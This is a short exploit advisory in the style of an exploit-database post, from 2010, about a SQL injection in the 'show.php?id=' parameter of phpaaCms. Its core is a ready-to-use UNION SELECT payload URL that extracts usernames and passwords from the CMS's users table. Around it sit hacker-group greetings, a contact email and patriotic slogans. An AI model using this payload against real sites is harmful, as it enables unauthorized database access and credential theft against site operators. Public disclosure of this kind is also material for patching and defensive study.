#Exploit Title: phpaaCms (show.php?id=) SQL injection Vulnerable
# Software http://www.phpaa.cn
# Tested on: win 7
# category: webapp
# Code : n/a
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
MWUHH TO Bl00dMafia: KashmiriMafia, Mirpuri, Mirzatun: gula, Boby, Mota & aSIM^JARRAL
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Gr33tz to All PakISTANI Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
----- [ Founder ] -----
Shafiq-Ur-rehman
----- [ Email] -----
aol.shafiq@gmail.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
{{{{TITLE}}}
PHPAA (show.php) Sql injection Vulnerable
+++++[ Vendor ]+++++
http://www.phpaa.cn
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
----- [ SQL Injection ] -----
Put [SQL CODE]
[Link] http://server/phpaaCMS/show.php?id=1[SQL CODE]
{Tested On}
----- [ Live Link (s) ] -----
[SQLi] http://<server>/show.php?id=1[CODE]
[SQLI] http://server/phpaaCMS/show.php?id=-194 union all select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Thanks To All: www.Exploit-db.com | Ksecurity-team Members|
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-muwhhh>>> http://www.sql-injection-tools.blogspot.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>>Live Long Pakistan<<
>>> Live Long Azad Kashmir<<<
>>> Proude To Be A Kashmiri+Pakistani<<<
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Bug discovered : 4 July 2010
